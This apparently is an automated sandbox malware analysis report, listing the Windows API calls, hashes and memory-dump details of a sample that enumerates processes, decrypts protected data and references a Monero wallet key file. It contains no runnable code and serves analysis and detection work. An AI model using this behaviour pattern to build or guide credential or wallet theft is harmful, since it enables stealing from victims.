                                • LocalFree.KERNEL32(?), ref: 00C372AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                • Instruction ID: 78bf64b4386e4890d85681ebd13a1b0fd44b6b079a9a40f6d0d85c1f47fdd8f4
                                • Opcode Fuzzy Hash: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                • Instruction Fuzzy Hash: C20140B5A40208BFEB14DBD4DD4AF9E7778AB44700F144154FB09BA2C0D670AA448B66
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C4961E
                                • Process32First.KERNEL32(00C50ACA,00000128), ref: 00C49632
                                • Process32Next.KERNEL32(00C50ACA,00000128), ref: 00C49647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00C4965C
                                • CloseHandle.KERNEL32(00C50ACA), ref: 00C4967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                • Instruction ID: 0a03d126868c0abf6a5924f4a7feef271f0d74d1add40938adf6b6ff81020a65
                                • Opcode Fuzzy Hash: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                • Instruction Fuzzy Hash: 36010C75A00218AFDB64DFA6DD48BEEB7F8FB48301F144199B909A6240D7749B84CF51
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C505B7), ref: 00C486CA
                                • Process32First.KERNEL32(?,00000128), ref: 00C486DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00C486F3
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • CloseHandle.KERNEL32(?), ref: 00C48761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                • Instruction ID: f285f9a0773b6932cc473a99fc1b3f5c4a7ec5d52a59d768def4321ab737bbf7
                                • Opcode Fuzzy Hash: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                • Instruction Fuzzy Hash: AD314B71941218ABDB24EF55DC55FEEB778FB45700F1041A9F50AA21A0DB306A89CFA2
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00C35184,40000001,00000000,00000000,?,00C35184), ref: 00C48EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                • Instruction ID: 8760ac708f2ddf2c82227d93d8de90e33693bee95a0e885efb14d9215bd4b0f7
                                • Opcode Fuzzy Hash: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                • Instruction Fuzzy Hash: E5111C74200204BFDB04CFA5D884FAF33A9BF89700F149458F9198B250DB75ED89DB61
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                • LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                • Instruction ID: ac751f89cd04d213f82487a2b4db917d3cccc3f7119eb643b78c7756c37f8636
                                • Opcode Fuzzy Hash: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                • Instruction Fuzzy Hash: 6811A4B4240208EFEB14CF64DC95FAAB7B5FB89704F248058F9199B390C7B5AA41CB51
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E00,00000000,?), ref: 00C479B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C479B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00C50E00,00000000,?), ref: 00C479C4
                                • wsprintfA.USER32 ref: 00C479F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                • Instruction ID: e1ad326ab419198135ed0330580746a4280350571a0e87a93e9889cd631b6514
                                • Opcode Fuzzy Hash: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                • Instruction Fuzzy Hash: F9112AB2904118ABCB14DFCADD45BBEB7F8FB4CB11F14425AF605A2280D3395944D7B1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,019FE850,00000000,?,00C50E10,00000000,?,00000000,00000000), ref: 00C47A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,019FE850,00000000,?,00C50E10,00000000,?,00000000,00000000,?), ref: 00C47A7D
                                • wsprintfA.USER32 ref: 00C47AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                • Instruction ID: 071a9c1ccec66b07f00f42669cda62c20f75f6ef02cd405cd0550bd38b76e58b
                                • Opcode Fuzzy Hash: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                • Instruction Fuzzy Hash: F6118EB1A45218EFEB20DB55DC49FA9B778FB44721F1043AAE91AA32C0C7741A84CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2x|$?H_$V5<
                                • API String ID: 0-3609585474
                                • Opcode ID: 0246997eb0d55240648c6bcef4ad827630e2b79d41f780e45ad020787866c249
                                • Instruction ID: ce03052f59c06075c01a7d52b1639073757275aaf7a10d2330ff7a726838990f
                                • Opcode Fuzzy Hash: 0246997eb0d55240648c6bcef4ad827630e2b79d41f780e45ad020787866c249
                                • Instruction Fuzzy Hash: FA72D3F360C2009FE304AE29EC8567ABBE5EF94720F1A893DE6C4C3744EA7558058796
                                APIs
                                • CoCreateInstance.COMBASE(00C4E118,00000000,00000001,00C4E108,00000000), ref: 00C43758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C437B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                • Instruction ID: 9797de6c42d11033f88b4def1076d3a683dea2d38cfcd45e1a4beae4cc539ad5
                                • Opcode Fuzzy Hash: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                • Instruction Fuzzy Hash: 35410770A40A289FDB24DB58CC94B9BB7B4BB88702F4041D9E608E72D0E771AEC5CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                • LocalFree.KERNEL32(?), ref: 00C39BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 68b523be26f6e53e0d180e10db2724291736f8027ed62db00255908e869cac8c
                                • Instruction ID: ee4d6aff26a0833f90c78d3bb17cfb33b1ee23f9a39e33341bcc48f3190f2481
                                • Opcode Fuzzy Hash: 68b523be26f6e53e0d180e10db2724291736f8027ed62db00255908e869cac8c
                                • Instruction Fuzzy Hash: AB110CB8A00209DFCB04DF94D989AAEB7B9FF88300F1045A8E915A7350D770AE54CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <9n$w>;
                                • API String ID: 0-2891070851
                                • Opcode ID: 9a184014fe9d83f52940ee589af46ffe495134456585e6cf7a8bc6b7e2f37337
                                • Instruction ID: b0c5ad3a6fe5b32273dcf2714b8b470c60f4a9137ab19abe34777f44eb19f672
                                • Opcode Fuzzy Hash: 9a184014fe9d83f52940ee589af46ffe495134456585e6cf7a8bc6b7e2f37337
                                • Instruction Fuzzy Hash: E4B2E5F36082049FE7046E2DEC8577ABBE9EF94720F1A453DEAC4C3744EA3598058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +s}$!U{u
                                • API String ID: 0-12891374
                                • Opcode ID: 36eec9c3b93f74fad34bbb2d33c505dc826396c531da0f00d4a947d234d90fdc
                                • Instruction ID: 9d6cf8fcd6b1daaf6541a01a3b692f72fdc62f23a7fae53f7ff7310d15faa396
                                • Opcode Fuzzy Hash: 36eec9c3b93f74fad34bbb2d33c505dc826396c531da0f00d4a947d234d90fdc
                                • Instruction Fuzzy Hash: C8B2E0F2A0C6049FE304AF29EC8567AFBE9EF94320F16893DE6C4C7344E63558458697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: O'y$k;~g
                                • API String ID: 0-2522017536
                                • Opcode ID: 1236f9b310e23d04095f7d63cb2e9cd478adc496496c054c636a819ebc21189d
                                • Instruction ID: 12e30bc067cec554b7723e8208614f0a0d0b1ee9ada19d8d1cf509e3143e79c8
                                • Opcode Fuzzy Hash: 1236f9b310e23d04095f7d63cb2e9cd478adc496496c054c636a819ebc21189d
                                • Instruction Fuzzy Hash: 8BA209F3A08200AFE304AE2DEC8567ABBE9EFD4720F1A853DE6C4C7744E57558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: n!S${O'
                                • API String ID: 0-3851219209
                                • Opcode ID: 90a3a296203a77dcf0c1d067c40b6a943463829a50ec0db3f27fd57ce8792014
                                • Instruction ID: a96d693dbc480c6cf4f0466804774de6ae7952808f4591268fd0f48858ef3c84
                                • Opcode Fuzzy Hash: 90a3a296203a77dcf0c1d067c40b6a943463829a50ec0db3f27fd57ce8792014
                                • Instruction Fuzzy Hash: 058107B3A0C2049FE308AE2ADC4577AB7DAEBD4320F1A863DE5C5C7744EA3558468652
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _`\m$~/
                                • API String ID: 0-1952511750
                                • Opcode ID: e025391c6e161d79729769221214a40b2d80932974508e5efcf7a2e0c597ced8
                                • Instruction ID: b2aac87ac82761acc2d63e43d076de95bbd3d26b3a2f12faef3fb6d0e34c2d3f
                                • Opcode Fuzzy Hash: e025391c6e161d79729769221214a40b2d80932974508e5efcf7a2e0c597ced8
                                • Instruction Fuzzy Hash: FB31E5B250D300EFE746AE14D881ABAFBE8FF58311F16092DE6C593250E7359880CB97
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hQ;
                                • API String ID: 0-2269190248
                                • Opcode ID: e07ca60fe70016c4dde7b86f98bd546997632782ea66250e63339c055684e461
                                • Instruction ID: 0466d1efbc94115d8834273c42c1d69c86115d22b45a7383cff8552f641c1fcd
                                • Opcode Fuzzy Hash: e07ca60fe70016c4dde7b86f98bd546997632782ea66250e63339c055684e461
                                • Instruction Fuzzy Hash: 4802F6F3608604AFE3046E2DEC81A6AF7EAEFD4760F1A493DE6C4C7744E53599018693
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
